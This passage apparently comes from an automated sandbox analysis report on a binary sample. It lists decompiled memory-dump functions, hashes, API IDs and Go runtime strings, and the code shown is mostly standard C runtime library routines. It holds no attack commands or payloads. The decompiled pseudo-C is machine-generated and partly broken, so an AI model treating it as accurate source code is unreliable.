                                                                                                                            • String ID: , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWRPPalmyreneSamaritanSundaneseWSASendToWriteFileatomicor8bad prunechan sendcomplex64copystackctxt != 0debugLockhchanLea$attempt to clear non-empty span setfile type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc$fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount !=$head = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiop$span set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgoroutine running on other thread; stack unavailablegcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - de
                                                                                                                            • API String ID: 0-3357717887
                                                                                                                            • Opcode ID: aed5e41c494874cab476ea500c6f5ff176b03d1f7cfddd5187176bf9ae1dedb5
                                                                                                                            • Instruction ID: ea95aa95826988c7484917422e89288f11be5cb821758bee860273aff019c6d6
                                                                                                                            • Opcode Fuzzy Hash: aed5e41c494874cab476ea500c6f5ff176b03d1f7cfddd5187176bf9ae1dedb5
                                                                                                                            • Instruction Fuzzy Hash: 6A21DC32704B5286EB19EB68E49039E6768F7E874CF40882ADE8D03724DF3CC250C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACB138 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634798775-0
                                                                                                                            • Opcode ID: 7bce626d7afc9819c7f1e58d7e894cd5191f436782fc08b52c428c94075eafe2
                                                                                                                            • Instruction ID: aa0f7e1137d8614f9cf7eb1754606820eec2a7cbd6c2c23a815fdbb993728ff8
                                                                                                                            • Opcode Fuzzy Hash: 7bce626d7afc9819c7f1e58d7e894cd5191f436782fc08b52c428c94075eafe2
                                                                                                                            • Instruction Fuzzy Hash: 0C51D832208F194AEF6A5A6D5C4D33971C1E75A321F34022DF45AC39F2EB72DC534599
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AB10D0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: clock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3195780754-0
                                                                                                                            • Opcode ID: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction ID: 7de45547bb9cd632c67bd357052b7dc8b1ca29300949d81c6e29260c270d32a5
                                                                                                                            • Opcode Fuzzy Hash: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction Fuzzy Hash: 5721C97340CB080AEF65AD986C4A266B6D0E755365F25022DF986C3652F6609C4282E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD9FB8 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4151157258-0
                                                                                                                            • Opcode ID: 5705c219c9d75adeb5e274b84b5cdd4a7d2fb13a0f2fa6746f6d221e16d3604e
                                                                                                                            • Instruction ID: 5710f91ec1629663358fd23307a41bbdec5aef1ad73c20bc3f36f62fd9592a09
                                                                                                                            • Opcode Fuzzy Hash: 5705c219c9d75adeb5e274b84b5cdd4a7d2fb13a0f2fa6746f6d221e16d3604e
                                                                                                                            • Instruction Fuzzy Hash: 56216A2361CE644EEFA297184C8D33936D2E749333F240559F096C38C1E778D841C2A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A893B8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0000025B25BF8A893B8(void* __edx, void* __eflags, signed char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				char _v40;
				void* _t17;
				signed int _t23;
				signed short _t24;
				signed short _t27;
				void* _t30;
				signed char* _t43;
				signed char* _t47;
				signed char* _t48;
				intOrPtr _t58;
				char* _t59;

				_t43 = __rax;
				r8d = 0;
				goto 0xf8a893c0;
				_a8 = __rbx;
				_a16 = __rsi;
				_t30 = __edx;
				_t3 =  &_v40; // 0xd
				E0000025B25BF8A7C0AC(__rax, _t3, __r8);
				if (__rcx != 0) goto 0xf8a893fa;
				_t17 = E0000025B25BF8A7B89C(_t43);
				 *_t43 = 0x16;
				E0000025B25BF8A7BEC4(_t17);
				goto 0xf8a89454;
				_t58 = _v32;
				if ( *((intOrPtr*)(_t58 + 8)) != 0) goto 0xf8a89413;
				strchr(_t59);
				_t47 = _t43;
				goto 0xf8a89457;
				_t24 =  *_t47 & 0x000000ff;
				if (_t24 == 0) goto 0xf8a8944d;
				if ((_t43[_t58 + 0x19] & 0x00000004) == 0) goto 0xf8a89441;
				_t48 =  &(_t47[1]);
				if ( *_t48 == sil) goto 0xf8a89454;
				_t27 = (_t24 & 0x0000ffff) << 0x00000008 |  *_t48 & 0x000000ff;
				if (_t30 != _t27) goto 0xf8a89448;
				goto 0xf8a89457;
				if (_t30 == (_t27 & 0x0000ffff)) goto 0xf8a8944d;
				goto 0xf8a89413;
				_t23 = _t27 & 0x0000ffff;
				if (_t30 == _t23) goto 0xf8a89457;
				if (_v16 == sil) goto 0xf8a8946a;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				return _t23;
			}

















                                                                                                                            0x25bf8a893b8
                                                                                                                            0x25bf8a893b8
                                                                                                                            0x25bf8a893bb
                                                                                                                            0x25bf8a893c0
                                                                                                                            0x25bf8a893c5
                                                                                                                            0x25bf8a893d2
                                                                                                                            0x25bf8a893d4
                                                                                                                            0x25bf8a893dc
                                                                                                                            0x25bf8a893e6
                                                                                                                            0x25bf8a893e8
                                                                                                                            0x25bf8a893ed
                                                                                                                            0x25bf8a893f3
                                                                                                                            0x25bf8a893f8
                                                                                                                            0x25bf8a893fa
                                                                                                                            0x25bf8a89402
                                                                                                                            0x25bf8a89409
                                                                                                                            0x25bf8a8940e
                                                                                                                            0x25bf8a89411
                                                                                                                            0x25bf8a89413
                                                                                                                            0x25bf8a89419
                                                                                                                            0x25bf8a89423
                                                                                                                            0x25bf8a89425
                                                                                                                            0x25bf8a8942b
                                                                                                                            0x25bf8a89436
                                                                                                                            0x25bf8a8943a
                                                                                                                            0x25bf8a8943f
                                                                                                                            0x25bf8a89446
                                                                                                                            0x25bf8a8944b
                                                                                                                            0x25bf8a8944d
                                                                                                                            0x25bf8a89452
                                                                                                                            0x25bf8a8945c
                                                                                                                            0x25bf8a89463
                                                                                                                            0x25bf8a8947c

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4151157258-0
                                                                                                                            • Opcode ID: 1372c0821d97a5e4a86b9bb15949324630c8f3187dca1cf9f881e1ac9ae961b3
                                                                                                                            • Instruction ID: f7c192731604a4fb5a86c80c6273a613a26cdb39be95ccec047174b2611e7dea
                                                                                                                            • Opcode Fuzzy Hash: 1372c0821d97a5e4a86b9bb15949324630c8f3187dca1cf9f881e1ac9ae961b3
                                                                                                                            • Instruction Fuzzy Hash: 9B21AE63628AA081FF625611BC5C37DA690E380BF7F3C4125FA9B0AEC5DB38C4419738
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A604D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: clock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3195780754-0
                                                                                                                            • Opcode ID: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction ID: a6e87d32126a06bad382556f4b0a3346622f23a498fdb4610ab6a77b13ecddbd
                                                                                                                            • Opcode Fuzzy Hash: d7a4d761e54538920b4b935b993e67a53848bc2dc46ab41d145f102206191f98
                                                                                                                            • Instruction Fuzzy Hash: F311E723204B4445FF729E667C4462BF690F7443B1F39B425FE5523A89EB74C8D1C664
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6FC8C Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E0000025B25BF8A6FC8C(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				void* __rdi;
				int _t17;
				void* _t18;
				void* _t21;
				void* _t23;
				void* _t29;
				void* _t31;
				void* _t32;
				long long _t40;
				long long _t48;
				void* _t51;
				long long _t53;
				void* _t54;
				long long _t58;
				void* _t69;
				void* _t70;

				_t48 = __rdx;
				_t37 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				malloc(??);
				_v24 = __rdx;
				E0000025B25BF8A794CC(_t23, 0x4000, __rax, __rax, __rdx, 0xf8a8bb18, __rcx);
				if (r8d == 0) goto 0xf8a6fce0;
				remove(??);
				goto 0xf8a6fce5;
				_t17 = remove(??);
				_t40 = _a8;
				_t58 = _a16;
				_t53 = _a24;
				_pop(_t51);
				goto E0000025B25BF8A790D8;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = _t40;
				_a16 = _t58;
				_a24 = _t53;
				_push(_t51);
				_t29 = r8d;
				r8d = 0;
				_t54 = __rax;
				_t18 = E0000025B25BF8A8B518(_t17, 0x4000, 0, _t29, _t31, __rax, _t40, __rax, _t48, _t51, __rax, _t69, _t70);
				if (_t18 != 0) goto 0xf8a6fd36;
				goto 0xf8a6fd58;
				if (1 - _t29 >= 0) goto 0xf8a6fd32;
				_t21 = E0000025B25BF8A793C0(0x4000, 0, _t29, _t32, _t48, _t48, _t51);
				r8d = _t18;
				return E0000025B25BF8A8B518(_t21, 0x4000, 0, _t29, _t31, _t37, _t40, _t54, _t48, _t51, _t54, _t69, _t70);
			}




















                                                                                                                            0x25bf8a6fc8c
                                                                                                                            0x25bf8a6fc8c
                                                                                                                            0x25bf8a6fc8c
                                                                                                                            0x25bf8a6fc91
                                                                                                                            0x25bf8a6fc96
                                                                                                                            0x25bf8a6fcae
                                                                                                                            0x25bf8a6fcc8
                                                                                                                            0x25bf8a6fccd
                                                                                                                            0x25bf8a6fcd7
                                                                                                                            0x25bf8a6fcd9
                                                                                                                            0x25bf8a6fcde
                                                                                                                            0x25bf8a6fce0
                                                                                                                            0x25bf8a6fce8
                                                                                                                            0x25bf8a6fced
                                                                                                                            0x25bf8a6fcf2
                                                                                                                            0x25bf8a6fcfb
                                                                                                                            0x25bf8a6fcfc
                                                                                                                            0x25bf8a6fd01
                                                                                                                            0x25bf8a6fd02
                                                                                                                            0x25bf8a6fd03
                                                                                                                            0x25bf8a6fd04
                                                                                                                            0x25bf8a6fd09
                                                                                                                            0x25bf8a6fd0e
                                                                                                                            0x25bf8a6fd13
                                                                                                                            0x25bf8a6fd18
                                                                                                                            0x25bf8a6fd1e
                                                                                                                            0x25bf8a6fd23
                                                                                                                            0x25bf8a6fd26
                                                                                                                            0x25bf8a6fd30
                                                                                                                            0x25bf8a6fd34
                                                                                                                            0x25bf8a6fd3a
                                                                                                                            0x25bf8a6fd44
                                                                                                                            0x25bf8a6fd49
                                                                                                                            0x25bf8a6fd6c

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$remove$__copy_path_to_wide_string_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078080488-0
                                                                                                                            • Opcode ID: 548fe609cd5e3755ebec080ec3bcac8cd848b7821eed1c8d262471da4c3b07b6
                                                                                                                            • Instruction ID: 6598548145cf1076dea0629ff0572a787ade2c99cd705cda682226b5570b5f5f
                                                                                                                            • Opcode Fuzzy Hash: 548fe609cd5e3755ebec080ec3bcac8cd848b7821eed1c8d262471da4c3b07b6
                                                                                                                            • Instruction Fuzzy Hash: B1F09063604E8185EA119B12BC1939EA220E784BE1F684421BF8917F9ACF3CC41187A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACE705 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable
                                                                                                                            • String ID: $csm
                                                                                                                            • API String ID: 3104724169-717980254
                                                                                                                            • Opcode ID: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction ID: 69c74cf1e050ed5c79b8e0845b03ea2dd260b7ef642e91eaaaa557286a9e6d57
                                                                                                                            • Opcode Fuzzy Hash: 6fd12170077310210e4a067a79524cced3896a0abe59c1130f854dc253b70f79
                                                                                                                            • Instruction Fuzzy Hash: C261C432608E088FEF19AF1CDC8972877D1EB55325F64406DF84ADB6A2DB30D852C759
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A883B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E0000025B25BF8A883B0(void* __edi, void* __esp, void* __rax, void* __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r10, void* __r11, void* __r12, intOrPtr _a12, char _a44, signed int _a4368, signed long long _a4372, long long _a4388, signed int _a4396) {
				void* __rdi;
				void* _t117;
				void* _t119;
				signed long long _t130;
				signed long long _t144;
				signed long long _t146;
				signed long long _t148;
				signed long long _t150;
				void* _t187;
				signed long long _t188;

				E0000025B25BF8A7A9C0(0x1150, __rax, __r10, __r11);
				_t188 = _t187 - __rax;
				memset(__edi, 0xcccccccc, 0x454 << 2);
				_t119 = __esp + 0xc;
				_t117 = __edi + 0x454;
				_t130 =  *0xf8a9c990; // 0x18002eb3c
				_a4396 = _t130 ^ _t188;
				_a4368 = 0;
				_a4368 = _a4368 + 1;
				if (_a4368 - 3 >= 0) goto 0xf8a886b3;
				E0000025B25BF8A634DC(__rdx);
				_a4388 =  &M0000025B25BF8A967D0 + 4 + _a4368 * 0x44;
				r8d = 0;
				_a12 = E0000025B25BF8A86190( *((intOrPtr*)( &M0000025B25BF8A967D0 + _a4368 * 0x44)), _t117, _t119, _a4388, _a4388,  &_a44);
				if (_a12 == 0) goto 0xf8a8847c;
				goto 0xf8a886b5;
				E0000025B25BF8A87060(_t117, _t119,  &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44, _t188 + 0x10f8 + _t134 * 0,  &_a44);
				E0000025B25BF8A879D0(_t117, _t119, _t188 + 0x10f8 + ( &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44) * 0, _t188 + _t188 + 0x10f8 + _t134 * 0 + 0x10f8,  &_a44);
				r8d = 0x10;
				if (E0000025B25BF8A85160(0x10, _t188 + 0x10f8 +  &M0000025B25BF8A967D0 * 0,  &M0000025B25BF8A967D0 + 0x34 + _a4368 * 0x44,  &_a44) != 0) goto 0xf8a88557;
				_t144 =  &M0000025B25BF8A967D0 + 0x24 + _a4368 * 0x44;
				r8d = 0x10;
				if (E0000025B25BF8A85160(0x10, _t188 +  &M0000025B25BF8A967D0 + 0x10f8, _t144,  &_a44) == 0) goto 0xf8a88561;
				goto 0xf8a886b5;
				_a4372 = 0;
				goto 0xf8a8857e;
				_a4372 = _a4372 + 1;
				if (_a4372 - 0x10 >= 0) goto 0xf8a885a7;
				_t146 = _t188 + 0x10f8 + _t144 * 0;
				_t168 = _a4372;
				 *((char*)(_t146 + _a4372)) = 0;
				goto 0xf8a8856e;
				_a4372 = 0;
				goto 0xf8a885c4;
				_a4372 = _a4372 + 1;
				if (_a4372 - 0x3e8 >= 0) goto 0xf8a88602;
				_t148 = _t188 + 0x10f8 + _t146 * 0;
				E0000025B25BF8A87060(_t117, _t119, _t188 + 0x10f8 + _t168 * 0, _t148,  &_a44);
				goto 0xf8a885b4;
				_a4372 = 0;
				goto 0xf8a8861f;
				_a4372 = _a4372 + 1;
				if (_a4372 - 0x3e8 >= 0) goto 0xf8a8865d;
				_t150 = _t188 + 0x10f8 + _t148 * 0;
				E0000025B25BF8A879D0(_t117, _t119, _t188 + 0x10f8 + (_t188 + 0x10f8 + _t168 * 0) * 0, _t150,  &_a44);
				goto 0xf8a8860f;
				_a4372 = 0;
				goto 0xf8a8867a;
				_a4372 = _a4372 + 1;
				if (_a4372 - 0x10 >= 0) goto 0xf8a886ae;
				if (( *(_t188 + 0x10f8 + _t150 * 0 + _a4372) & 0x000000ff) == 0) goto 0xf8a886ac;
				goto 0xf8a886b5;
				goto 0xf8a8866a;
				goto L1;
				__eax = 0;
				__rdi = __rax;
				__rcx = __rsp;
				__rdx = L" Check Failure #%d - %s";
				__eax = E0000025B25BF8A88AFC(__rbx, __rsp, __rdx, __rsi);
				__rax = __rdi;
				__rcx = _a4396;
				__rcx = _a4396 ^ __rsp;
				__eax = E0000025B25BF8A81A50(__ecx, __rbx, _a4396 ^ __rsp, __rdx, __rdi, __rsi, __rbp, __r12);
				__rsp = __rsp + 0x1150;
				return __eax;
			}













                                                                                                                            0x25bf8a883b7
                                                                                                                            0x25bf8a883bc
                                                                                                                            0x25bf8a883cc
                                                                                                                            0x25bf8a883cc
                                                                                                                            0x25bf8a883cc
                                                                                                                            0x25bf8a883ce
                                                                                                                            0x25bf8a883d8
                                                                                                                            0x25bf8a883e0
                                                                                                                            0x25bf8a883f6
                                                                                                                            0x25bf8a88405
                                                                                                                            0x25bf8a88415
                                                                                                                            0x25bf8a88445
                                                                                                                            0x25bf8a88452
                                                                                                                            0x25bf8a88468
                                                                                                                            0x25bf8a88471
                                                                                                                            0x25bf8a88477
                                                                                                                            0x25bf8a884ad
                                                                                                                            0x25bf8a884dc
                                                                                                                            0x25bf8a8850a
                                                                                                                            0x25bf8a8851a
                                                                                                                            0x25bf8a8852f
                                                                                                                            0x25bf8a88545
                                                                                                                            0x25bf8a88555
                                                                                                                            0x25bf8a8855c
                                                                                                                            0x25bf8a88561
                                                                                                                            0x25bf8a8856c
                                                                                                                            0x25bf8a88577
                                                                                                                            0x25bf8a88586
                                                                                                                            0x25bf8a88591
                                                                                                                            0x25bf8a88599
                                                                                                                            0x25bf8a885a1
                                                                                                                            0x25bf8a885a5
                                                                                                                            0x25bf8a885a7
                                                                                                                            0x25bf8a885b2
                                                                                                                            0x25bf8a885bd
                                                                                                                            0x25bf8a885cf
                                                                                                                            0x25bf8a885da
                                                                                                                            0x25bf8a885fb
                                                                                                                            0x25bf8a88600
                                                                                                                            0x25bf8a88602
                                                                                                                            0x25bf8a8860d
                                                                                                                            0x25bf8a88618
                                                                                                                            0x25bf8a8862a
                                                                                                                            0x25bf8a88635
                                                                                                                            0x25bf8a88656
                                                                                                                            0x25bf8a8865b
                                                                                                                            0x25bf8a8865d
                                                                                                                            0x25bf8a88668
                                                                                                                            0x25bf8a88673
                                                                                                                            0x25bf8a88682
                                                                                                                            0x25bf8a886a3
                                                                                                                            0x25bf8a886aa
                                                                                                                            0x25bf8a886ac
                                                                                                                            0x25bf8a886ae
                                                                                                                            0x25bf8a886b3
                                                                                                                            0x25bf8a886b5
                                                                                                                            0x25bf8a886b8
                                                                                                                            0x25bf8a886bb
                                                                                                                            0x25bf8a886c2
                                                                                                                            0x25bf8a886c7
                                                                                                                            0x25bf8a886ca
                                                                                                                            0x25bf8a886d2
                                                                                                                            0x25bf8a886d5
                                                                                                                            0x25bf8a886da
                                                                                                                            0x25bf8a886e2

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckStackVars
                                                                                                                            • String ID: Check Failure #%d - %s$e quality of the resulting optimized code.
                                                                                                                            • API String ID: 3047416515-1761781716
                                                                                                                            • Opcode ID: 7cf6e32b5016d3f7ec797622aafe6f1297cc0b9e576a922faab2381133933de0
                                                                                                                            • Instruction ID: b7d1079fb961bf9be1dfd6019e2fc5948651098ccdf2d95845a4cccb47c422c2
                                                                                                                            • Opcode Fuzzy Hash: 7cf6e32b5016d3f7ec797622aafe6f1297cc0b9e576a922faab2381133933de0
                                                                                                                            • Instruction Fuzzy Hash: 06812E72304AC185EF25CB14EC993E9A2A4E788765F601436F79D86F94DB78C145CB24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7DB05 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 27%
                                                                                                                            			E0000025B25BF8A7DB05(void* __eax, signed int __ecx, void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t84;
				void* _t85;
				intOrPtr _t103;
				void* _t117;
				void* _t135;
				long long _t138;
				intOrPtr* _t140;
				signed long long _t148;
				void* _t154;
				signed long long _t155;
				void* _t159;
				long long _t161;
				intOrPtr* _t162;
				void* _t164;
				void* _t165;
				void* _t169;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr _t175;
				void* _t177;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;
				void* _t183;
				void* _t185;

				_t172 = __r9;
				asm("stc");
				asm("adc al, 0x7d");
				if (__eflags >= 0) goto 0x3f90ebd4;
				 *((intOrPtr*)(__rax - 0x73)) =  *((intOrPtr*)(__rax - 0x73)) + __ecx;
				 *(__rax - 1) =  *(__rax - 1) ^ __ecx;
				asm("int3");
				asm("int3");
				asm("int3");
				_t135 = _t164;
				 *((long long*)(_t135 + 8)) = __rbx;
				 *((long long*)(_t135 + 0x10)) = _t161;
				 *((long long*)(_t135 + 0x18)) = __rsi;
				_t165 = _t164 - 0x40;
				_t175 =  *((intOrPtr*)(__r9 + 8));
				_t140 =  *((intOrPtr*)(__r9 + 0x38));
				_t185 =  *__r9 - _t175;
				_t181 = __r9;
				_t178 = __rdx;
				_t162 = __rcx;
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xf8a7dc3f;
				 *((long long*)(_t135 - 0x38)) = __rcx;
				 *((long long*)(_t135 - 0x30)) = __r8;
				if ( *((intOrPtr*)(__r9 + 0x48)) -  *_t140 >= 0) goto 0xf8a7dcdf;
				_t155 = _t154 + _t154;
				if (_t185 - _t135 < 0) goto 0xf8a7dc31;
				if (_t185 - _t135 >= 0) goto 0xf8a7dc31;
				if ( *((intOrPtr*)(_t140 + 0x10 + _t155 * 8)) == 0) goto 0xf8a7dc31;
				if ( *((intOrPtr*)(_t140 + 0xc + _t155 * 8)) == 1) goto 0xf8a7dbbd;
				_t117 =  *((long long*)(_t135 + _t175))(_t183, _t180, _t177, _t174, _t154);
				if (_t117 < 0) goto 0xf8a7dc38;
				if (_t117 <= 0) goto 0xf8a7dc31;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0xf8a7dbee;
				if ( *0xf8aa7488 == 0) goto 0xf8a7dbee;
				if (E0000025B25BF8A7E530(_t135 + _t175, _t140, 0xf8aa7488) == 0) goto 0xf8a7dbee;
				_t84 =  *0xf8aa7488();
				r8d = 1;
				_t85 = E0000025B25BF8A80030(_t84, _t162 + _t175, _t178);
				_t103 =  *((intOrPtr*)(_t140 + 0x10 + _t155 * 8));
				r9d =  *_t162;
				 *((long long*)(_t165 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t138 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t165 + 0x20)) = _t138;
				"x64"();
				E0000025B25BF8A80060(_t85);
				goto 0xf8a7db6d;
				goto 0xf8a7dce4;
				_t159 =  *((intOrPtr*)(_t172 + 0x20)) - _t175;
				goto 0xf8a7dcd5;
				_t148 = _t178 + _t178;
				if (_t185 - _t138 < 0) goto 0xf8a7dcd3;
				if (_t185 - _t138 >= 0) goto 0xf8a7dcd3;
				if (( *(_t162 + 4) & 0x00000020) == 0) goto 0xf8a7dcad;
				r9d = 0;
				if (_t103 == 0) goto 0xf8a7dca8;
				_t169 = _t140 + 8;
				if (_t159 - _t138 < 0) goto 0xf8a7dc9c;
				if (_t159 - _t138 >= 0) goto 0xf8a7dc9c;
				if ( *((intOrPtr*)(_t169 + 8)) !=  *((intOrPtr*)(_t140 + 0x10 + _t148 * 8))) goto 0xf8a7dc9c;
				if ( *((intOrPtr*)(_t169 + 4)) ==  *((intOrPtr*)(_t140 + 0xc + _t148 * 8))) goto 0xf8a7dca8;
				r9d = r9d + 1;
				if (r9d - _t103 < 0) goto 0xf8a7dc77;
				if (r9d != _t103) goto 0xf8a7dcdf;
				if ( *((intOrPtr*)(_t140 + 0x10 + _t148 * 8)) == 0) goto 0xf8a7dcbc;
				if (_t159 == _t138) goto 0xf8a7dcdf;
				goto 0xf8a7dcd3;
				 *((intOrPtr*)(_t181 + 0x48)) = _t155 + 1;
				r8d =  *((intOrPtr*)(_t140 + 0xc + _t148 * 8));
				 *((long long*)(_t169 + 0x10 + _t175))();
				if ( *((intOrPtr*)(_t172 + 0x48)) + 1 -  *_t140 < 0) goto 0xf8a7dc4f;
				return 1;
			}




























                                                                                                                            0x25bf8a7db05
                                                                                                                            0x25bf8a7db05
                                                                                                                            0x25bf8a7db06
                                                                                                                            0x25bf8a7db0d
                                                                                                                            0x25bf8a7db15
